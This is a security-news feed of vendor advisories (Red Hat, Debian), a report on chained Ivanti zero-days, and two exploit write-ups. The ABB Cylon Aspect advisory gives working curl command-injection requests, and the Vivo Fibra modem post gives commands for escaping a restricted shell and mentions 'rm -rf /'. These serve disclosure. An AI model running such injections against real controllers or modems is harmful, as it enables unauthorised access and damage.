Red Hat Security Advisory 2024-8083-03 - An update for grafana is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8083.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: grafana security updateAdvisory ID:        RHSA-2024:8083-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:8083Issue date:         2024-10-15Revision:           03CVE Names:          CVE-2024-21489====================================================================Summary: An update for grafana is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Grafana is an open source, feature rich metrics dashboard and graph editor for Graphite, InfluxDB & OpenTSDB. Security Fix(es):* uplot: Prototype Pollution in uplot (CVE-2024-21489)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-21489References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2315838

Red Hat Security Advisory 2024-8083-03

Red Hat Security Advisory 2024-8082-03 - An update for.NET 6.0 is now available for Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, Red Hat Enterprise Linux 8.6 Telecommunications Update Service, and Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8082.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: .NET 6.0 security updateAdvisory ID:        RHSA-2024:8082-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:8082Issue date:         2024-10-15Revision:           03CVE Names:          CVE-2024-43483====================================================================Summary: An update for .NET 6.0 is now available for Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, Red Hat Enterprise Linux 8.6 Telecommunications Update Service, and Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:.NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation.New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 6.0.135 and .NET Runtime 6.0.1.35.Security Fix(es):* dotnet: Multiple .NET components susceptible to hash flooding (CVE-2024-43483)* dotnet: System.IO.Packaging - Multiple DoS vectors in use of SortedList (CVE-2024-43484)* dotnet: Denial of Service in System.Text.Json (CVE-2024-43485)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Security Fix(es):* dotnet: System.IO.Packaging - Multiple DoS vectors in use of SortedList (CVE-2024-43484)* dotnet: Multiple .NET components susceptible to hash flooding (CVE-2024-43483)* dotnet: Denial of Service in System.Text.Json (CVE-2024-43485)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-43483References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2315729https://bugzilla.redhat.com/show_bug.cgi?id=2315730https://bugzilla.redhat.com/show_bug.cgi?id=2315731

Red Hat Security Advisory 2024-8082-03

Red Hat Security Advisory 2024-8081-03 - An update for OpenIPMI is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8081.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: OpenIPMI security updateAdvisory ID:        RHSA-2024:8081-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:8081Issue date:         2024-10-15Revision:           03CVE Names:          CVE-2024-42934====================================================================Summary: An update for OpenIPMI is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The OpenIPMI packages provide command-line tools and utilities to access platform information using Intelligent Platform Management Interface (IPMI). System administrators can use OpenIPMI to manage systems and to perform system health monitoring.Security Fix(es):* openipmi: missing check on the authorization type on incoming LAN messages in IPMI simulator (CVE-2024-42934)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-42934References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2308375

Red Hat Security Advisory 2024-8081-03

Red Hat Security Advisory 2024-8077-03 - An update is now available for Red Hat JBoss Enterprise Application Platform 7.4 for Red Hat Enterprise Linux 9. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link in the References section. Issues addressed include cross site scripting and denial of service vulnerabilities.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8077.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Red Hat JBoss Enterprise Application Platform 7.4.19 Security update  
Advisory ID:        RHSA-2024:8077-03  
Product:            Red Hat JBoss Enterprise Application Platform  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:8077  
Issue date:         2024-10-15  
Revision:           03  
CVE Names:          CVE-2022-34169  
====================================================================

Summary: 

An update is now available for Red Hat JBoss Enterprise Application Platform 7.4 for Red Hat Enterprise Linux 9.  
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat JBoss Enterprise Application Platform 7 is a platform for Java applications based on the WildFly application runtime. This release of Red Hat JBoss Enterprise Application Platform 7.4.19 serves as a replacement for Red Hat JBoss Enterprise Application Platform 7.4.18, and includes bug fixes and enhancements. See the Red Hat JBoss Enterprise Application Platform 7.4.19 Release Notes for information about the most significant bug fixes and enhancements included in this release.

Security Fix(es):

* braces: fails to limit the number of characters it can handle [eap-7.4.z] (CVE-2024-4068)

* jose4j: denial of service via specially crafted JWE [eap-7.4.z] (CVE-2023-51775)

* wildfly-domain-http: wildfly: No timeout for EAP management interface may lead to Denial of Service (DoS) [eap-7.4.z] (CVE-2024-4029)

* xalan: integer truncation issue in Xalan-J (JAXP, 8285407) [eap-7.4.z] (CVE-2022-34169)

* org.jsoup/jsoup: The jsoup cleaner may incorrectly sanitize crafted XSS attempts if SafeList.preserveRelativeLinks is enabled [eap-7.4.z] (CVE-2022-36033)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgements, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

CVEs:

CVE-2022-34169

References:

https://access.redhat.com/security/updates/classification/#important  
https://docs.redhat.com/en/documentation/red_hat_jboss_enterprise_application_platform/7.4  
https://docs.redhat.com/en/documentation/red_hat_jboss_enterprise_application_platform/7.4/html-single/installation_guide/index  
https://bugzilla.redhat.com/show_bug.cgi?id=2108554  
https://bugzilla.redhat.com/show_bug.cgi?id=2127078  
https://bugzilla.redhat.com/show_bug.cgi?id=2266921  
https://bugzilla.redhat.com/show_bug.cgi?id=2278615  
https://bugzilla.redhat.com/show_bug.cgi?id=2280600  
https://issues.redhat.com/browse/JBEAP-27051  
https://issues.redhat.com/browse/JBEAP-27357  
https://issues.redhat.com/browse/JBEAP-27548  
https://issues.redhat.com/browse/JBEAP-27613  
https://issues.redhat.com/browse/JBEAP-27658  
https://issues.redhat.com/browse/JBEAP-27700  
https://issues.redhat.com/browse/JBEAP-27701  
https://issues.redhat.com/browse/JBEAP-27713  
https://issues.redhat.com/browse/JBEAP-27714  
https://issues.redhat.com/browse/JBEAP-27715  
https://issues.redhat.com/browse/JBEAP-27746  
https://issues.redhat.com/browse/JBEAP-27747

Red Hat Security Advisory 2024-8077-03

Suspected nation-state actors are spotted stringing together three different zero-days in the Ivanti Cloud Services Application to gain persistent access to a targeted system.

Source: Kristoffer Tripplaar via Alamy Stock Photo

A deft chaining together of three separate zero-day flaws in Ivanti's Cloud Service Appliance allowed a particularly potent cyberattacker to infiltrate a target network and execute malicious actions, leading researchers to conclude a nation-state actor was actively targeting these vulnerable systems.

Fortinet's FortiGuard Labs published its findings, warning that any organization running Ivanti's CSA version 4.6 and prior without taking necessary remediation precautions is vulnerable to this method of attack.

The details of the newly uncovered attack chain come amid the announcement of a bevy of additional security flaws in Ivanti's CSA also under active exploit.

"The advanced adversaries were observed exploiting and chaining zero-day vulnerabilities to establish beachhead access in the victim's network," Fortinet's report said. "This incident is a prime example of how threat actors chain zero-day vulnerabilities to gain initial access to a victim’s network."

The three specific Ivanti CSA flaws used in the attack were a command injection flaw in the DateTimeTab.php resource tracked as CVE-2024-8190, a critical path traversal vulnerability in the /client/index.php resource tracked as CVE-2024-8963, and an unauthenticated command injection vuln tracked as CVE-2024-9380 affecting reports.php.

Once initial access was established using the path traversal bug, the threat group was able to exploit the command injection flaw in the resource reports.php to drop a Web shell. The group exploited a separate SQL injection flaw on Ivanti's backend SQL database server (SQLS) tracked as CVE-2024-29824 to gain remote execution on the SQLS system, the researchers noted.

After Ivanti released a patch for the command injection flaw, the attack group acted to ensure other adversaries do not follow them onto the compromised systems. "On September 10, 2024, when the advisory for CVE-2024-8190 was published by Ivanti, the threat actor, still active in the customer's network, 'patched' the command injection vulnerabilities in the resources /gsb/DateTimeTab.php, and /gsb/reports.php, making them unexploitable," the FortiGuard Labs team added in the report. "In the past, threat actors have been observed to patch vulnerabilities after having exploited them, and gained foothold into the victim's network, to stop any other intruder from gaining access to the vulnerable asset(s), and potentially interfering with their attack operations."

In this instance, analysts suspected the group was trying to use sophisticated techniques to maintain access, including launching a DNS tunneling attack via PowerShell, and dropping a Linux kernel object rootkit on the compromised CSA system.

"The likely motive behind this was for the threat actor to maintain kernel-level persistence on the CSA device, which may survive even a factory reset," Fortinet researchers said.

Serious Adversaries Circle Ivanti CSA Zero-Day Flaws

Debian Linux Security Advisory 5791-1 - Elyas Damej discovered that a sandbox mechanism in ReportLab, a Python library to create PDF documents, could be bypassed which may result in the execution of arbitrary code when converting malformed HTML to a PDF document.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5791-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffOctober 13, 2024                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : python-reportlabCVE ID         : CVE-2023-33733Elyas Damej discovered that a sandbox mechanism in ReportLab, a Pythonlibrary to create PDF documents, could be bypassed which may result inthe execution of arbitrary code when converting malformed HTML to a PDFdocument.For the stable distribution (bookworm), this problem has been fixed inversion 3.6.12-1+deb12u1.We recommend that you upgrade your python-reportlab packages.For the detailed security status of python-reportlab please refer toits security tracker page at:https://security-tracker.debian.org/tracker/python-reportlabFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmcMDm4ACgkQEMKTtsN8Tja2Lw//RW9W1X/NuzRQKUmUf+5jPBY48jOsfoOCjJTEUXSjptjP0m5QA/xsd78b2C4Eq9SooafXXPufiJGbtYs0CP4Xvuok/G1rPkgpcZPYQ2m9Bbcrp6JAMrb/CeAumsuBCQc7IgaCz8AkMh81JxNy5CqVvh9EJdKgZYyviT7wa5Bqyx6TBicfQHdZ8bNk6xQqh0S3+rzkKoau9YE0rYWRZ/AOLki5PUGqsEJOzXFpwn4Ahvk/pBCTra7E/k0oL2bUmVSFtTJcdowtofbh/c9K8ZQmI0k8CMU82LU4cTaV6UjK+498JWpQLl6uq5RISKppR3I5tsk+DVAve4ek1yAyXNrgscm1u62IxSDQpuBc3GgW6cN5nrKYHoALdnjiRD+8OSChTIOpbVSZ4y9tUFU7mHRoVkne4pNohujV/8M1umupJ108nXA34avR+B7DsResI70m19/ocLR5uH1v/rGO4FUrSfAKgOYBR8ryO/YcbDROixyOHFN7vxCUxXF3UPc3uPVuQilHOCi0w+S4JxcLywFXoDIj1qtGlzKA9rtAMA6okHILJKCy43lEo+36nr0WZMZuF7kDQLPkpb1+6zf3Mxwj8QrpRFCT+DYyLfg5MLYLM4Trbavtpk/faXQoP+pLMfjIaq8Nrd7/UOXFQXWFSUh8YwOm99je9zr1Am35zftZnNU==MICC-----END PGP SIGNATURE-----

Debian Security Advisory 5791-1

ABB Cylon Aspect version 3.08.00 suffers from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the PROXY HTTP POST parameter called by the yumSettings.php script.

  
ABB Cylon Aspect 3.08.00 (yumSettings.php) Remote Code Execution

Vendor: ABB Ltd.  
Product web page: https://www.global.abb  
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio  
                  Firmware: <=3.08.00

Summary: ASPECT is an award-winning scalable building energy management  
and control solution designed to allow users seamless access to their  
building data through standard building protocols including smart devices.

Desc: The ABB BMS/BAS controller suffers from an authenticated OS command  
injection vulnerability. This can be exploited to inject and execute arbitrary  
shell commands through the 'PROXY' HTTP POST parameter called by the yumSettings.php  
script.

Tested on: GNU/Linux 3.15.10 (armv7l)  
           GNU/Linux 3.10.0 (x86_64)  
           GNU/Linux 2.6.32 (x86_64)  
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz  
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz  
           PHP/7.3.11  
           PHP/5.6.30  
           PHP/5.4.16  
           PHP/4.4.8  
           PHP/5.3.3  
           AspectFT Automation Application Server  
           lighttpd/1.4.32  
           lighttpd/1.4.18  
           Apache/2.2.15 (CentOS)  
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)  
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
                            @zeroscience

Advisory ID: ZSL-2024-5841  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5841.php

21.04.2024

--

$ cat project

                 P   R   O   J   E   C   T

                        .|  
                        | |  
                        |'|            ._____  
                ___    |  |            |.   |' .---"|  
        _    .-'   '-. |  |     .--'|  ||   | _|    |  
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |  
     |' | |.    |    ||       | |   |  |    ||      |  
 ____|  '-'     '    ""       '-'   '-.'    '`      |____  
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░    
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░   
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░   
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ 

$ curl -X POST "http://192.168.73.31/yumSettings.php" \  
> -H "Cookie: PHPSESSID=xxx" \  
> -d "CMD=set&PROXY=;id>/tmp/blah"  
Set proxy called - no proxy given:  
$   
$ curl -X POST "http://192.168.73.31/caldavUtil.php" \  
> -d "command=postFooter&Footer=%60cat /tmp/blah%60"  
Set footer to uid=33(www-data) gid=33(www-data) groups=33(www-data):

ABB Cylon Aspect 3.08.00 yumSettings.php Command Injection

Debian Linux Security Advisory 5790-1 - It was discovered that DOMPurify, a sanitizer for HTML, MathML and SVG was susceptible to nesting-based mXSS.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5790-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffOctober 13, 2024                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : node-dompurifyCVE ID         : CVE-2024-47875It was discovered that DOMPurify, a sanitizer for HTML, MathML and SVG wassusceptible to nesting-based mXSS.For the stable distribution (bookworm), this problem has been fixed inversion 2.4.1+dfsg+~2.4.0-2.We recommend that you upgrade your node-dompurify packages.For the detailed security status of node-dompurify please refer toits security tracker page at:https://security-tracker.debian.org/tracker/node-dompurifyFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmcMCGEACgkQEMKTtsN8TjZW5g//Uc2ZeYTX4O8kHZ9IHHL7v9n6pxPG9MLYgiMt11YSs5k6qVT20NvqfWWyN9ZNQkBCtYpKRO3wym5AcfR9UsZxVh3AlT8Q+Y7lHBYxiaQw82ygNQT2nAU32wBSMHnZvjHEAdH/iZWeR2VROVHjwR7bU9cbzc2/dVt1W7WJTLPY8lAqAAJ5D4/6Nlcb1JMwupP1XIW26gSYBGx+RXuKitSr1jKBoraDtAGUtpZQMP7JwKXt+WSLe4mStXwQmQhMkmNd28sonJVAEl/EjvZq1KuEONlj5doPMtMC9eU7HBtXu6b2JoPVyO6FZnx76lMqT+JV9VIqj1MfJofLSv4kT8PfM18KaNHBqtiR370D0q6gxfQxIibvu4WXPmG8CNw/ew4LRwswQMQPSscEGdo8jz3WKhKnLMB6HRWg0m9LMJXQcmNLPiAS8NIcOSDtK8sQC8ODIjR1lYzetnu7Y6o69KWdreFVlHgaWqROfBtxmQ0cf4vBQchZd3cCRsFHtPQ2xsNsbIQoJhst2XzJsNVlgcB78qMiKfc7fsZh7/Uy0oq2jclSA1nWQUoszFblTVCn44fLIS97bn2WggiAqUymBBSyAGeZp//6CuoYik62ARHW5tYXvsa1oq9/d/I5RcBMbNHn2VNyxmzpnkbaFFYS/Sz86ihL17Ao7IOD8ssvaHzGeTw==lKMx-----END PGP SIGNATURE-----

Debian Security Advisory 5790-1

Debian Linux Security Advisory 5789-1 - Multiple security issues were discovered in Thunderbird, which could result in the execution of arbitrary code.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5789-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffOctober 12, 2024                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : thunderbirdCVE ID         : CVE-2024-9392 CVE-2024-9393 CVE-2024-9394 CVE-2024-9401                  CVE-2024-9680Multiple security issues were discovered in Thunderbird, which couldresult in the execution of arbitrary code.For the stable distribution (bookworm), these problems have been fixed inversion 1:115.16.0esr-1~deb12u1.We recommend that you upgrade your thunderbird packages.For the detailed security status of thunderbird please refer toits security tracker page at:https://security-tracker.debian.org/tracker/thunderbirdFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmcKScgACgkQEMKTtsN8TjZxqg/+IotH08Pw5gFZxPLZ0XmP72798ftJNHzws+5sBYSf66i/W3vcWy51fHZUMSzQ/rJE0b/FappKSzBVrKZyrm1JWvkEOMGa72fUTXcGcbvVn68XbFrZCYHs5ec/ErU3j++tQeKXCIt6JOmwZlbz0gEbFv3W3JUpPpkrp+8ZnWHd8e6dmG56yYfzNATIMAb25Emw1W8aSivopokv96X5FpuzCpVllzgJgwURCQdZhbLaoLfoHWhHPSsRIK2MCxN3isjS/b41D1wHM9dO2gQ7Yp1d4rWMooSk2fKG5hub2lZbJ3SmVmf0UQcQssXsBy+FTU9g+01VUXwKVUKpmJ9TKakGdwaBBlHo1Y5OzAJf0XZl2TrTGCbsAn+wjLH5TxX2HMiBIiEKRn2QkJP4nzExWVy2Xj07XpuI9YMnP4ZAxjNJkZXcE9kDgL9x6qrXW9Lh4W2APbW9WG5o3J+HZLs7/7dv8jbhbtekaAjVFK6Ex09iTB0HNo3GBoFgwTA0MloSPy933aYhyZh1LA/h7OjJ9+mHUQdjAe8bDyRVNItX1U0/E34KA2KwbK9fis/DIxNAQzdKYyGoFrjnT3rnv/gPMGB+5cbhNyIo3lWnKMqigu5xJJMhAbBmrvP15cIo2jF6oDwpAFh5a9q35ElTOOq5CJBqIg92r95DlLB6Em4iMM3t/gs==CztN-----END PGP SIGNATURE-----

Debian Security Advisory 5789-1

The Vivo Fibra Askey RTF8225VW modem suffers from an input validation vulnerability that allows for full escalation to a functioning shell once logged in and using the restricted aspsh shell.

    ---# Exploit 1## Documentation on the Vivo Fibra Modem ExploitI discovered an exploit that allows access to the `sh` shell on the Vivo Fibra modem. This method essentially involves terminating the `aspsh` shell and invoking `sh` using the output of `cat /dev/null`. Using the pipe (`|`) is crucial for this exploit, it is the base of the exploit.## Known Affected Devices- **Model**: Askey RTF8225VW    - **Software Version**: BR_SG_g1.13_RTF_TEF004_V2.35    - **Revision**: REV3    - **CLI Version**: Reduced_CLI_HGU_v26 (Vivo Fibra firmware)    - **System Info**: Linux (none) 4.4.115  ## The ExploitTo begin, access the modem by connecting to `support@{modem's IP}` via SSH. It does not matter if the connection is local or public, as SSH port (22) is open to the internet. The `support` user has privileged access, but the password is the same as the admin password.You will need to enter the password, which is typically an 8-digit mix of letters and numbers. Once logged in, you will be greeted with `aspsh`, a very limited shell designed for technical services. Its purpose is to prevent you from using `sh` or `bash` for security reasons.The critical part begins here: the only Unix-like programs you can execute are `ls`, `top`, `cat`, and `free`. There are other programs available in `aspsh`, but they are not useful for this exploit.## How to Execute the ExploitIn `aspsh`, enter the following command:```aspshcat /dev/null | ps | grep aspsh```This command helps you discover the process ID of `aspsh -k`. The `cat /dev/null` command returns nothing, allowing you to execute `ps` and `grep aspsh`. The output should look something like this:```2298 support  13612 S    aspsh -k27492 support  13608 S    -aspsh31961 support   3308 S    sh -c cat /dev/null | ps | grep aspsh31964 support   3312 S    grep aspsh```Once you have identified the process ID, you can terminate the `aspsh` loop that restricts your access.Next, run the command:```aspshcat /dev/null | kill 2298 && sh```In this command, `cat /dev/null` still returns nothing, allowing you to use its output to kill the `aspsh -k` process. The `&& sh` part then invokes `sh` in its place.And that's it! You now have access to `sh`, providing you with unlimited possibilities for manipulating your modem.## Why This Exploit Is DangerousIf someone with malicious intent exploits this vulnerability, they could use tools like Wireshark or similar applications to monitor network activity. They could also execute destructive commands like `rm -rf /`, effectively destroying the system and rendering the hardware essentially unusable, with no option to reset it.---

Tag

#linux